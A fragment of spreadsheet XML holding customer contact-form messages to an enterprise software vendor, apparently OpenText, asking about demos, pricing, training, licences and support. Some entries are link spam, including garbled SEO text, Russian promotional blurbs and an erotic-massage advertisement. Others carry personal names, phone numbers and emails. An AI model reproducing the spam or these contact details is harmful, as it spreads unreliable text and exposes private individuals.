    <t>We are evaluating your Capture Center 16.2 to try to OCR invoice, 30 days evaluation license will be expired on 12/03/2017, is there any free training course or demo video for how to setup profile and OCR invoice from the training and learning services team?</t>
  </si>
  <si>
    <t>Hello, we are a retailer of Skechers USA and would like to know the cost of having access to their UPC bank. If you can please give me a quote. Their account # is 123107989611. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Kelsey Rozier and our Legal and Corporate teams are looking for a Document Management System. I wanted to touch base to see what your availability is like for a quick call. The objective of this call would be to ask questions about your product to determine its capabilities and see if it is the right fit to move forward with a demo. _x000D_
_x000D_
Please let me know if you have any questions. </t>
  </si>
  <si>
    <t xml:space="preserve">I came across your website after searching for startup companies on austin.startups-list.com._x000D_
_x000D_
And I was wondering if you would like to partner up? _x000D_
_x000D_
Basically what we do is make animated videos that are designed to promote your services online and increase your website conversion rate._x000D_
_x000D_
So I wanted to offer you a 30 second animated whiteboard video for your so product for just $197. (including script/voiceover)_x000D_
_x000D_
All I ask in return is a quick testimonial if you like the video!_x000D_
_x000D_
If you are interested in this offer, you can find out more and get started at www.30secondexplainervideos.com/whiteboard-promo_x000D_
_x000D_
Or can you shoot me a quick email for a brief discussion!_x000D_
_x000D_
Cheers, Travis _x000D_
www.30secondexplainervideos.com/whiteboard-promo_x000D_
</t>
  </si>
  <si>
    <t>I would like to get in touch with who deals with the sale of TeleForm in Italy. Thank you</t>
  </si>
  <si>
    <t>We are a procurement consulting firm and are looking to understand if you provide off-the shelf software or portal solutions that can serve as a community engagement tracking system for one of our clients in South Africa. The purpose is to cater to management of volunteering and community based activities for employees within our client's organization. We are looking at a centralized repository/portal with reporting, file sharing, communication, skill based volunteer matching, governance workflows, activity search &amp; feedback mechanisms. We would like to speak to one of your consultants to understand if your ECM suite could be customized to address this requirement.</t>
  </si>
  <si>
    <t>interest in product and pricing</t>
  </si>
  <si>
    <t>I would like to ask you have slots in intership? I would like to apply. Thank you</t>
  </si>
  <si>
    <t>I'm evaluating different provider in the ECM space. Do you think would be possible to schedule a demo section to have an overview of your ECM software, features, capabilities and user interface?_x000D_
Many thanks,_x000D_
Nicolo</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madame,_x000D_
_x000D_
can you please send me an updated Elite point balance?_x000D_
_x000D_
Best regards_x000D_
_x000D_
Barbara _x000D_
</t>
  </si>
  <si>
    <t>I need access to the 'Learning Central' to complete two courses: Portfolio (eDocs 10) and Partner Learn Track.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My company is partner and I'm looking for install a demo of the last version of ApplicationXtender. Where can I find the donwload URL?_x000D_
Please contact by email._x000D_
_x000D_
Thank you, regrads.</t>
  </si>
  <si>
    <t>We have received renewal notice Nr.RC210706 and we would like to pay for it but unfortunately link you provided dosn't work. https://support.opentext.com/rr-RC210706-1398143   How can we pay? We prefer paying by credit card._x000D_
Thank you,_x000D_
Best regards_x000D_
Airita</t>
  </si>
  <si>
    <t>Dear Sirs_x000D_
_x000D_
I am hereby contacting you, to adress my needs to have a formal course, and/or certification on the DOCUMENTUM plattform._x000D_
_x000D_
I hereby request your informations for any documentum courses in Portugal, or in Europe, such as date, duration, location and cost._x000D_
_x000D_
Thank you for your time and cooperation_x000D_
_x000D_
Best Regards_x000D_
_x000D_
Miguel Santos</t>
  </si>
  <si>
    <t>We recently purchased Opentext Exceed Powersuite, an electronic download document was sent to us..Registration wa completed as instructed, but each time we try to access the product download link, it comes up with an "Access Denied" statement.</t>
  </si>
  <si>
    <t xml:space="preserve">We are a procurement consulting firm and are looking to understand if you provide off-the shelf software or portal solutions that can serve as a community engagement tracking system (as an extension of your ECM) for one of our clients in South Africa. The purpose is to cater to management of volunteering and community based activities for employees within our client's organization. We are looking at a centralized repository/portal with reporting, file sharing, communication, skill based volunteer matching, governance workflows, activity search &amp; feedback mechanisms. </t>
  </si>
  <si>
    <t>Some questions about Standard Support for RightFax, S-CP-ASPSUPPORT</t>
  </si>
  <si>
    <t>We sent you a termination of contract on 11 Oct 2017. The DHL document shipping was picked up / countersigned by V. Duffney. OpenText needs to confirm good receipt of this termination of contract. May I kindly ask you to do so via e-mail or using the duplicate we sent you? Thanks in advance for an update from your side. Best regards, Roger</t>
  </si>
  <si>
    <t>We are currently using a cloud based B2B supply chain integration solution for our document exchange in the healthcare sector.  I would like to investigate what Open Text are able to provide us.  We are currently using Open Text for the Grocery side of the business.  I will not be contactable Monday 20/11, please contact me Tuesday 21/11 if this is suitable._x000D_
Thank you.</t>
  </si>
  <si>
    <t>I am Kiruthika from Texila E-conference ,I am really honored and excited to invite you to be our advertisement partner for our grand E-conference named Global Digital Marketing Submit which is scheduled on Dec 8 to 10 this year.For more details visit our page https://gdms.texilaconference.org/. we all looking forward to meeting with you and discuss our business plan together.we hope you will be present for sale.</t>
  </si>
  <si>
    <t>Том Чапман из США проехал всю Новую Зеландию с игрушечной рыбой. По словам американца, игрушка помогает ему найти общий язык с окружающими, пишет новозеландское издание Stuff, подробнее об этом читайте на сайте [url=http://gturs.com]gturs.com[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;strong&gt;What is  Your browser nidicates if you've visited this link&lt;/strong&gt;.&lt;br&gt; &lt;h4&gt;HELP! Mycatisleakingurine ?  Yahoo Answers Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt;  _x000D_
 [url=http://8pistcomlayubc.soup.io/]Why do cat scratches burn[/url] [url=http://591naefihautsu4p.soup.io/]Feliway sale[/url]  _x000D_
 &lt;i&gt;ToyotaTouch-UpSprayPaint-  Sold Here. Guaranteed to Match hte original factory color chip provided by the vehicle's manufacturer. Order YourToyota Spray &lt;h4&gt;TheBestToysforPlayfulCatsand Dogs  DIY Your browser indicates if you've vosited this link&lt;/h4&gt;.&lt;br&gt;  _x000D_
spray against cats _x000D_
 _x000D_
 Pet Life 8-piecePinkDogToySet. ... Penn Plax Hide and Seek ElectronicMouseHBunt. 6 Reviews.  .Catsare highly intelligent and curious animals,  Your browser indicatees if you've visited this link&lt;/i&gt;.&lt;br&gt; Consistency is key to potty-training a new puppy. Teaching him to go in the same place, and cleaning up accidents quickly, help him learn faster and  To Buy CitiKitty вЂ“ CitKiitty  patented CitiKitty Cat Toilet Training Kit uses a proven, disappearing litter box technique that has successfully toilet trained cats for decades.  Kwitter Cat Toilet Training System  cat Litter Boxes  PetSmart&lt;/h2&gt;.&lt;br&gt;  _x000D_
  [url=http://inorqui-bu43.soup.io/]Taste deterrents for cats[/url] [url=http://98geocurta-gax5.soup.io/]Best toys for indoor cats[/url]  _x000D_
 &lt;h2&gt;SportPetCatPlayCubCeatFurniture -  the best sleectgion ofcat cube toyhere at  Source cheap and high quality products in hundreds of categories wholesale direct from  Cube Toy ,Cat Cube ToySuppliers and ... - Alibaba&lt;/i&gt;.&lt;br&gt; &lt;h3&gt;FoxRepellents Compare Prices at Nextag Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt;  _x000D_
how to keep cats off furniture spray _x000D_
 _x000D_
4 Р»РёРї. 2013 СЂ. -If yourcat'sbehavior hass changed and he has stopped using the litter ... When you punish acatforpeeingor poopingoutsideof thebox , &lt;i&gt;Symptoms &amp; Signs ofCatUrinary Tract Infections Your rbowser indciates if you've visitd this link&lt;/i&gt;.&lt;br</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know your policy on cancelling training. One of my staff was registered for e-training, and will be unable to attend. </t>
  </si>
  <si>
    <t xml:space="preserve">I would like information on how we can utilize OpenText eCatalogue to synchronize 832 data with GDSN certified data pools. What are the benefits of going this route as opposed to going directly to the data pool? I can be better reached by email as I am not always at my desk. </t>
  </si>
  <si>
    <t>Картофель порезать соломкой, хорошо промыть, отварить, морковь натереть и обжарить вместе с луком на масле. Добавить зажарку в суп, сцедить и отжать грибы, положить в кастрюлю к картофелю, проварить 5 минут. Всыпать промытый рис и варить 10 минут, читайте об этом подробнее на сайте [url=http://zonakulinara.ru]zonakulinara.ru[/url]</t>
  </si>
  <si>
    <t>Did you still sell nfs software for windows 98?   I have an upgrade opportunity for a customer on an antique tool</t>
  </si>
  <si>
    <t>Need help to upgrade from windows 2003 server</t>
  </si>
  <si>
    <t>I am interested in the Hybrid RightFax solution and the pricing. We are a healthcare facility governed by HIPAA. _x000D_
Thank you, _x000D_
Regina Bertani</t>
  </si>
  <si>
    <t>I'd like to download and test BIRT iHub.  Where is a safe site to download this software from?</t>
  </si>
  <si>
    <t xml:space="preserve"> Cystitis Symptoms and Treatment  Health  Bupa UK Your browser indicates if you've visited this link Cystitis . Uncover further information from Bupa about the symptoms, treatment and causes ofcystitis . Symptoms includebloodinyoururineand cloudyurine .  /health-information/directory/c/cystitis More results.&lt;br&gt; &lt;i&gt;Howdoyougetthe caturinesmell out of acouch ? - Quora Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
 [url=http://laufasnopo9b.soup.io/]Geelong footy team[/url] [url=http://155orosgresn80.soup.io/]How to get cat urine out of rug[/url]  _x000D_
 Shop for cattoyon Etsy, the place to exprdss your creativity through the buying and selling of handmade and vintage  : Best Interactive Cat &amp; KittenToys Petco Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt; Removing CatUrineOdor from Caouch ThriftyFnu Your browser indicates if you've visited this link Caturineodor is strong and spmetimes difficult to removd from upholstered furniture. This is a guide about removing caturineodor from acouch .   More reuslts.&lt;br&gt;  _x000D_
natural cat ffurniture _x000D_
 _x000D_
 KittenmNames; hocolate Toxicity ... Urinating Outside the Litter oBx and Wandering Away from ... Urinating or defecating outside the litter box; Urinating or  Ways to Stop Your CatPeeing Outside the Litter BoxpetMD&lt;/strong&gt;.&lt;br&gt; MYCATPEESANDONMYCOUCH . MY WITS END. HAVE 2 LITTER BOXES ON EITER LEVEL OF THE HOUSE. FOOD IN DIFFERENT ROO.M I - Answered by a verifiedCatVeterinarian.&lt;br&gt;  _x000D_
  [url=http://4nuepromeret2.soup.io/]How to stop tom cat spraying in house[/url] [url=http://7silsatiorolk.soup.io/]How to keep cats out of garden naturally[/url]  _x000D_
 I dont have any friends who woulds want a  14 year oldcatthat peeseverywhere . ... MJy 14 year oldcatpeeseverywhefe , ...  14 year odlcatpeeseverywhere , what to do?  Yahoo Answers Your browser indicates if you've visited thsi link&lt;/strong&gt;.&lt;br&gt; 1 Jun 2012 ... If you have hardwood floors at home, it's quite likely that you'll have to deal urine on it at some po</t>
  </si>
  <si>
    <t>The web version of eDocs is no longer working since the domain administrator password has been changed. I only started here 3 months ago and need assistance getting the web version of eDocs up and running again.</t>
  </si>
  <si>
    <t>Please provide login credentials._x000D_
Thanks</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
 _x000D_
I hope this email finds you well. I'm the Convention Coordinator for Visit Anaheim and updating our database for the best contact for meeting and events._x000D_
Could you please suggest who I can follow up with at Vignette? I look forward to your response. Have a great day ahead._x000D_
 _x000D_
Best,_x000D_
 _x000D_
Brooke Wilczynski_x000D_
Convention Sales Coordinator_x000D_
p: 714.765.2873 |  e: bwilczynski@visitanaheim.org</t>
  </si>
  <si>
    <t xml:space="preserve">Question about OpenText Content Server System Administrator Certification v16. If I register and pay for the OpenText Content Server System Administrator Certification v16 exam today, when do I have to actually take the exam and how do I schedule it? I understand that this is a web-based exam._x000D_
_x000D_
Chris McWilliams_x000D_
Senior Architect | Alitek_x000D_
Phone: 281-851-6042_x000D_
Email: cmcwilliams@alitek.com_x000D_
Website: alitek.com_x000D_
</t>
  </si>
  <si>
    <t>To whom it may concern_x000D_
I'm reaching out because I'd like to schedule a demo regarding your business process management suite and enterprise content management suite._x000D_
Please let me know if it's possible._x000D_
Many thanks,_x000D_
Nicolo</t>
  </si>
  <si>
    <t>To know about job vacancies.</t>
  </si>
  <si>
    <t xml:space="preserve">Your system's unsubscribe process is not working. Remove me from any email lists you have. </t>
  </si>
  <si>
    <t>Exploring pricing for educational BI options and would like to know what the pricing is for Magellan.</t>
  </si>
  <si>
    <t>I am trying to register in order to download a patch, but it won't accept my credentials.</t>
  </si>
  <si>
    <t>Aker BP are currently in the process of implementing D2 for technical documentation (-and other)._x000D_
Our technical register objects (tag-equipment-hierarchy) will be linked to documents in D2. Do you have any experience with customers who has built up their tag-equipment-hierarchy inside D2?_x000D_
Best regards_x000D_
Trygve Clausen</t>
  </si>
  <si>
    <t>Dear ladies and gentlemen,_x000D_
I have three short question about the icon i will see in the protocol if I will send an emai,l i got before, forword to an other email adress (outside the company an not to an firstclass adress)?_x000D_
Which text will I see there? in German "weitergeleitet"?_x000D_
Will there be a diffrence in the icon oder text, if i put the email just into another folder in my mailbox?_x000D_
_x000D_
Thank you very much!_x000D_
_x000D_
Sven Erdeljac</t>
  </si>
  <si>
    <t>Intersse EIM Cloud</t>
  </si>
  <si>
    <t>We write to request for fax broadcasting service be kind to tell us more about how the service work and the cost of sending faxes in US, your prompt respond will be highly appreciated._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Thomas Mason_x000D_
Carolina Direct Inc._x000D_
3088 S. Hwy. 14_x000D_
Greer, SC 29650_x000D_
t. (704)842-3535_x000D_
f. (704)842-3539_x000D_
www.scdiscountfurnitures.com</t>
  </si>
  <si>
    <t>I have figured out how to silently deploy the new FirstClass email client, but I would like another switch that unchecks the "Make this the default email client" option._x000D_
Is this available?_x000D_
Thanks so much,_x000D_
Terry</t>
  </si>
  <si>
    <t>Приветствую всех! _x000D_
Нашел Приколы за день на этом сайте:  http://okaybro.ru : _x000D_
http://okaybro.ru/foto-prikoly-interesnoe/3760-erin-uosson-v-so-it-goes-magazine.html [b] Эрин Уоссон в So It Goes Magazine [/b] _x000D_
[url=http://okaybro.ru/foto-prikoly-interesnoe/7389-neobychnye-domashnie-zhivotnye-odin-den-s-petuhom.html] Необычные домашние животные: один день с петухом [/url] _x000D_
http://okaybro.ru/foto-prikoly-interesnoe/5545-vnedorozhnik-bentely-bentayga-na-bezdorozhe.html _x000D_
http://okaybro.ru/foto-prikoly-interesnoe/4718-svyaschennyy-mesyac-ramadan-2015.html</t>
  </si>
  <si>
    <t>Varian currently has Easylink services.  Please advise if there is a user guide we can share with the end users.  Thank you.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Le Groupe ANDROS cherche à moderniser ses outils d'échanges BtoB, pourriez vous me contacter ?_x000D_
Merci._x000D_
Cordialement.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to edit a QRP file. The Report Builder 5.2 I found has run through its trial a couple of years ago it seems. </t>
  </si>
  <si>
    <t>Guten Tag Herr Davies,_x000D_
_x000D_
ich löse im Moment mein Domainportfolio größtenteils auf. _x000D_
_x000D_
Aus diesem Grund möchte ich Ihrem Unternehmen gerne meine Internetdomain_x000D_
_x000D_
		EDIschnittstelle.de_x000D_
_x000D_
zur Übernahme anbieten._x000D_
_x000D_
_x000D_
Meine Domain würde ich Ihrem Unternehmen im Gegenzug für einen amazon®-Einkaufgutschein _x000D_
in Höhe von 200,- € übertragen._x000D_
_x000D_
Über Ihr Interesse und Ihre Kontaktaufnahme würde ich mich freuen._x000D_
_x000D_
Vielen Dank im Voraus_x000D_
_x000D_
_x000D_
Dr. Ralf Ritter_x000D_
_x000D_
E:		ritter@ralfritter.com_x000D_
@:		ralfritter.com_x000D_
T:		0046 (0) 493 2 20 20_x000D_
linkedin:	linkedin.com/in/ralfritterCOM_x000D_
xing:		xing.to/ralfritterCOM_x000D_
_x000D_
Dr. Dipl.-Ing. Ralf Ritter | Premiumdomains_x000D_
Hummelstad_x000D_
59371 Ankarsrum_x000D_
Schweden_x000D_
_x000D_
_x000D_
Ich habe Ihr Unternehmen aufwendig und individuell recherchiert. Ich möchte mich vorsorglich und höflich bei _x000D_
Ihnen entschuldigen, falls Ihnen mein heutiges Angebot unangemessen erscheint oder Sie meine heutige _x000D_
e-Mail in Ihrem Berufsalltag stört. _x000D_
_x000D_
Bitte haben Sie Verständnis, dass der Zwischenverkauf bzw. die Zwischenabgabe stets vorbehalten ist. Mein _x000D_
Angebot hat eine grundsätzliche Gültigkeit von 7 Tagen und richtet sich ausschliesslich an Gewerbetreibende. _x000D_
Irrtum und Änderungen sind stets vorbehalten. _x000D_
_x000D_
Im Fall von wettbewerbsrechtlichen, domainrechtlichen, urheberrechtlichen oder ähnlichen Problemen bitte ich _x000D_
Sie höflich - auch zur Vermeidung unnötiger Rechtsstreitigkeiten und damit verbundener Kosten - umgehend _x000D_
Kontakt mit mir aufzunehmen._x000D_
_x000D_
Die marken- und namensrechtliche Überprüfung der Internetadresse(n) bzw. der Domain(s) ist vom Interessenten _x000D_
vor dem Kauf durchzuführen._x000D_
_x000D_
Gemachte Angaben zum Suchvolumen und/oder zum Alter einer Domain sind stets unverbindlich, da diverse _x000D_
Software und diverse spezialisierte Webseiten oftmals unterschiedliche Ergebnisse liefern._x000D_
_x000D_
Der Inhalt dieser e-Mail ist vertraulich und ausschliesslich für den bezeichneten Adressaten bestimmt. Wenn Sie_x000D_
nicht der vorgesehene Adressat dieser e-Mail - oder dessen Vertreter - sein sollt</t>
  </si>
  <si>
    <t>I am interested in the Content Server Administrator Certification course on Dec 18 in Ottawa.  I haven't done most of the pre-requisite courses, but I was an OT Professional Services Consultant from 1998-2000 and from 2004-2010 and have been an independent consultant doing Content Server Development and Configuration ever since. I am also a registered OpenText Technology partner.  Would I be able to enroll with experience in lieu of previous coursework?_x000D_
Thanks in advance._x000D_
-Hugh Ferguson_x000D_
PS If you ever offer a chance to write the CS Developer certification exam, I'd be interested in that too as I have extensive experience in Oscript.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are Florida, USA based team with offices in Atlanta/Australia/India and have 14 years of experience in Mobile App &amp; Website development. We strongly expertise in the following Platforms: PHP, WordPress,ASP.NET, nopCommerce, Shopify, Prestashop, Magento, Joomla, Drupal, BigCommerce, Android &amp; iOS._x000D_
_x000D_
Company Website http://www.sigmasolve.net_x000D_
_x000D_
Our hourly Rate: USD 12 And also open to working on Fixed/Monthly price._x000D_
_x000D_
Key Partnerships:_x000D_
Microsoft Silver Partner_x000D_
Gold Solution nopCommerce.com Partner _x000D_
Silver Partner - 3dcart.com_x000D_
Preferred Partner - BigCommerce.com_x000D_
Industry certified with 3D Cart, Volusion, Prestashop, and Shopify._x000D_
_x000D_
Regards_x000D_
Jogie Singh</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm hoping that I can speak with someone about your Analytics platform. We are reaching out to several BI software providers to determine what will work best for us as we grow. Our focus is on analyzing user data from a SaaS we are building for the insurance industry and creating regularly scheduled, management-level reports for our partners and affiliates._x000D_
_x000D_
A demo or consultation would be appreciated._x000D_
_x000D_
I look forward to your response._x000D_
_x000D_
Best,_x000D_
/Derick</t>
  </si>
  <si>
    <t>Hi, we are looking for a DMS for a project and we found m files suitable for the requirement. We shall be needing the license cost of documentum to get the budget approved for same. Also can anyone from your team shall be able to help us with non functional requirements to finalize this._x000D_
_x000D_
Thanks_x000D_
Devender</t>
  </si>
  <si>
    <t>Good morning,_x000D_
I bought brava reader CXL today and paid with paypal. I would like to know how do I get access to the product I bought or should I wait for shipping? If so how long will the wait be and do I have a tracking number._x000D_
Kindly provide more information. _x000D_
Your assistance will be highly appreciated._x000D_
_x000D_
Kind regards_x000D_
Duné Welgemoed</t>
  </si>
  <si>
    <t>Enquiry on Opentext Content Suite costing</t>
  </si>
  <si>
    <t xml:space="preserve">We are evaluating the ECM products to replace the existing legacy document management system in department. Considering OpenText ECM platform is the one of the potential option. We need a product demo to understand the more about the product and architecture etc.,   </t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
Could you please share me the cost of the certification Exam (#5-8055 OpenText Certified Documentum Consultant Exam). I need the cost details of this exam as urgent basis. Could you please do the needful ASAP?_x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Sourav Kar</t>
  </si>
  <si>
    <t>Problems with email import service.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We are a startup and are looking to use BIRT for reporting in our software - an education management system. _x000D_
_x000D_
We need to get access for our BIRT developers to online support on the BIRT project so that they can find help on how to achieve certain requirements using BIRT. _x000D_
_x000D_
What are our options?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
We are working on a solution for a whole of government scenario and need to explore further the Open Text product to see if this align with the clients requirements and can feed into the Meltwater dashboard reporting. _x000D_
_x000D_
This is an urgent request. _x000D_
_x000D_
thanks_x000D_
Mike </t>
  </si>
  <si>
    <t>Dear support,_x000D_
_x000D_
I am interesting in taking part in the course_x000D_
_x000D_
4-0140 OpenText Content Server IDE (CSIDE) Fundamentals v16_x000D_
_x000D_
Are you planning to run course in Sydney?_x000D_
_x000D_
Regards,_x000D_
Andrey Likhtarev</t>
  </si>
  <si>
    <t>Learn more about vendor invoice tracking system as the same is to be implemented in our SAP ERP system.</t>
  </si>
  <si>
    <t>Seeking a DAM for curriculum development company (Education K-12). Currently looking at Bynder, IntelligenceBank and Widen. Read about your company in Forrester report and would like to demo/trial. Want to implement for new curriculum development Jan 18.</t>
  </si>
  <si>
    <t xml:space="preserve">Challenge faced:_x000D_
_x000D_
-	Tons of paper files with no existing solution. Challenges include Compliance, regulatory, Search and risk of damage of critical documents._x000D_
-	Type of docs :  Statutory, Financial, Building drawings, Certificates, AMC’s, Equipment related documents etc.…_x000D_
-	Convert to digital data. Store, search, retrieve and archive with security for compliance._x000D_
-	It’s not about developing a solution but also about hosting and operational support too.  _x000D_
-	Need to find a complete solution ( Storage, Hosting ,VM , dedicated server, AMS, data storage, SOX policy) _x000D_
Document Size :  In millions._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">problem with attachments duplicating or not sending with e-mail. </t>
  </si>
  <si>
    <t>We are a very small business who is going to be working with Nordstrom.  We need to be EDI complient and have a UPC catalog.  ASAP.  Can you send me all your info.  THANK YOU!</t>
  </si>
  <si>
    <t>Младенцы часто плачут, но понять причину не всегда бывает просто. Сейчас врачи определяют, вызван ли плач болью, по гримасам на лицах детей. Но при использовании такого способа высока вероятность ошибки. Сотрудники Оксфордского университета разработали новый метод, пишет New Scientist, подробнее читайте на сайте [url=http://ladyup.ru]ladyup.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">I'm interested in discussing OpenText's contract management solution for Solera. Earlier this year, I met with OpenText's team in person and reviewed their platform while implementing a CLM system at McLane Company, Inc. in Temple, Texas. </t>
  </si>
  <si>
    <t>I would like to inquire as to the possibility of obtaining a 15 day free license for your OpenText Redact-It software. Would it be possible to test the software prior to purchase? Thanks, Jim</t>
  </si>
  <si>
    <t>Simple question.  We have used hummingbird/Exceed for years.  Now we have WIN10 OS and can't make what we had work to connect to unix/solaris.  Does OpenText handle this situation?</t>
  </si>
  <si>
    <t>Hello, I am having problems when someone sends me an EM. I open that EM and when I close it it disappears from my box. My mailbox only shows to who I send it, not the replying EM from the sender. Can you help please. Thanks.</t>
  </si>
  <si>
    <t>Hello, we need to make a few changes to our account - currently we have Katherine Sutton as our system administrator and she is no longer with the company.  Is it possible to change the system administrator to me?  We also need to extend access to a new teammate.  Thank you for your help.</t>
  </si>
  <si>
    <t>Good afternoon we are trying to reset or password and it is giving us a error can someone contact me to resolve this issue.</t>
  </si>
  <si>
    <t>Good Day, I would like to know if Opentext has a VAR programme or not and if so I would like to know more about it.</t>
  </si>
  <si>
    <t>Hi there and thank you for taking the time to read my message._x000D_
I'm producing a marketplace analysis of regulated content management systems for a current (life sciences) client and would like to understand the following for OpenText: a) product capabilities; b) pricing model; c) out-of-the-box integrations; d) compliance codes adhered to. I hope you can provide this. Just to stress, this isn't a sales lead at this stage so I'm only keen on hearing facts. I'm also interested in hearing about how you might have customized OpenText to fit regulatory and legal workflows. I trust this is acceptable._x000D_
Thanks again for any assistance you can provide. I appreciate it.</t>
  </si>
  <si>
    <t>Need to do course on VIM solution. Please let me know the details.</t>
  </si>
  <si>
    <t xml:space="preserve">Have bought Brava Viewer including maintenance for 78 $. Unfortunately there is no chance to inform my self about how to pay, when do I receive the Software and so on. </t>
  </si>
  <si>
    <t>We are a software developer and integrator with RightFax.  We need access to MySupport so that we can obtain documentation for the web services API for both 10.5 and 10.6.  I am in need of quick access so anything that can be done to expedite would be greatly appreciated.</t>
  </si>
  <si>
    <t>Understanding of product and see how it fits in our current need.</t>
  </si>
  <si>
    <t>I'd like to speak to someone about our company needs and a DAM solution RFI._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Brett</t>
  </si>
  <si>
    <t>I'd like to learn more about how Opentext can help us as we're interested in Vendor Invoice Management and how it help make us more efficient, and save us money.</t>
  </si>
  <si>
    <t>What is the annual cost for InfoArchive and what does it includes?</t>
  </si>
  <si>
    <t>Greetings Sir,_x000D_
I am siva priya Ranganatha and i would like to intern in your company , am studying 4th sem computer science at chrsit university faculty of engineering.</t>
  </si>
  <si>
    <t>Interest in Call Recording and Quality Management solutions</t>
  </si>
  <si>
    <t>We have requirement of Open Text dialogue License- 2 Qty, please provide a quote for the same. Also, let me know the governing agreement for the same.</t>
  </si>
  <si>
    <t>I am trying to send in a Verification of Employment form to be completed for one of your employees getting a loan, however I cannot get in touch with a person to get a fax or email address to send it to.  Please either reply to this email, or call 425-658-5379 and supply this information.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,_x000D_
ich würde gerne Ihren 64bit jdbc Treiber bei einem unserer Kunden, der bereits Gupta Kunde ist einsetzten. Leider ist dieser nicht JDBC 4 kompatibel. Sobald wir darüber auf die DB zugreifen kommt der Fehler isValid() returns false._x000D_
</t>
  </si>
  <si>
    <t>We are looking for a high level person, preferably the product owner or someone high enough in the management chain who can speak to the future direction of ExStream and current functionality.  We are currently using this product but would like to hear about what it can do, how we can put it to better use, etc.</t>
  </si>
  <si>
    <t>Tenho interesse em realizar testes no software (OpenText TeleForm) em uma versão Trial, a de verificar se o mesmo ira suprir a necessidade da empresa.</t>
  </si>
  <si>
    <t>Trying to find a local sales representative. I have a Right Fax Server opportunity. We currently have one customer with this solution already which we had to go through a one-off process to sell. As we grow as a company, we are looking to become a right fax business partner, if that's not possible looking to be granted another exception for the current opportunity we have</t>
  </si>
  <si>
    <t>По своим качественным характеристикам гипсокартон отлично подходит для отделки квартир, домов, офисов и других жилых помещений. Во -первых, этот материал экологичен и не содержит вредных веществ, которые могут оказывать негативное воздействие на здоровье человека и окружающую среду, во-вторых, гипсокатрон является энергосберегающим и звукоизолирующим материалом, он так же негорючий и огнестойкий. Подробнее читайте на сайте [url=http://sovet-sadovody.ru]sovet-sadovody.ru[/url]</t>
  </si>
  <si>
    <t>I need to know who our site Admin is. Thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
Hope all is well. I’m reaching out to see if you would be interested in partnering for our B2B online event in 2018. The event will be taking place from May 07-May 09, 2018 in the Chicago Marriott Downtown. B2B Online brings together manufacturers and distributors to connect and discuss detailed tactics for innovating B2B eCommerce and digital marketing. https://b2bmarketing.wbresearch.com/_x000D_
_x000D_
Let me know if you would be interested in putting together a non monetary agreement._x000D_
_x000D_
I look forward to hearing back!_x000D_
_x000D_
Best,_x000D_
Aaron</t>
  </si>
  <si>
    <t>We invite everyone to visit our spa and enjoy sensual massage. Masseurs will care for you. decent rooms equipped with all necessary essential for complex massage. The power of massage body rub  surpasses the traditional means of fighting depression and fatigue. During the session, you completely disconnect from the hustle and bustle of the world with all its troubles. Pleasant body models  makes you forget about everything and concentrate only on having fun. _x000D_
 _x000D_
We created a wonderful atmosphere in Studio , to cause you to relax and a sense of detachment from the outside world. After you try one of our massages, you definitely want to come back here again. The most  cute  and playful girls  are waiting for you in  spa center. _x000D_
 _x000D_
Salon of erotic massage woman in Downtown invites you to enjoy the art of relaxation. Order from us a program of any massage, and you will get not only pleasure but also pleasant emotions. _x000D_
 _x000D_
Visitors to Spa erotic massage woman can find many questionnaires massage specialist of any age and nationality performing thai massage in the city Manhattan. _x000D_
 _x000D_
Beauties are able not only to give pleasure in this way, but also to demonstrate their other abilities to men of the stronger sex. Specialists perform erotic a massage that will produce a On you a vivid impression. _x000D_
 _x000D_
Our showroom works in Brooklyn. : [url=https://erotic.manhattan-massage.com/]erotic massage queens[/url]</t>
  </si>
  <si>
    <t>I am the Director for Capture OEM at OpenText. This is a test. I want to know who receives this request. Please contact me via email. thank you. -Michael</t>
  </si>
  <si>
    <t>I've been trying to get access to my company support for teamsite,livesite,open text experience estudio, etc... My college Jill Chen has access when she login however, when I login I don't have the same access.  I need similar access as Jill Chen(JCHEN47@PARTNERS.ORG) to the existing company support account.  Please let me know if there's anything else that I am missing. Thanks</t>
  </si>
  <si>
    <t>HI,_x000D_
I would like to hear more about your solutions, and setup a meeting in the near future._x000D_
Regards,_x000D_
Jermy</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
at the moment I am busy with an internship project at Qimarox. This project is about analyzing BPM software and to select the best BPM software for Qimarox. I am now in the middle of the project and there are a couple of BPM software where I can choose of, so that is the reason wwhy I am searching for more information about the BPM softwares. The question I have is: what are the cost per user per month  for the bpm software&gt; Or is it a fixed price per month/year?_x000D_
_x000D_
Thanks in advance!_x000D_
_x000D_
Best regards,_x000D_
_x000D_
William Beelen</t>
  </si>
  <si>
    <t>Hello, im from Trask Solutions a.s. companny. _x000D_
The same as my coleagues Jiri Cesky, Martin Rihosek, Petr Sedlacek, Martin Panuska, Petr Sobota, Zdeno Franek, and so on..._x000D_
_x000D_
Ive created a simple account and Im trying to reach the address support.opentext.com but i cant._x000D_
_x000D_
1) I wasnt able to add my account into the general company account, can you help me with this step please?_x000D_
2) System everytime wants to confirm my email address and everytime it says confirmation success. Next time im asked to confirm my mail again and again._x000D_
_x000D_
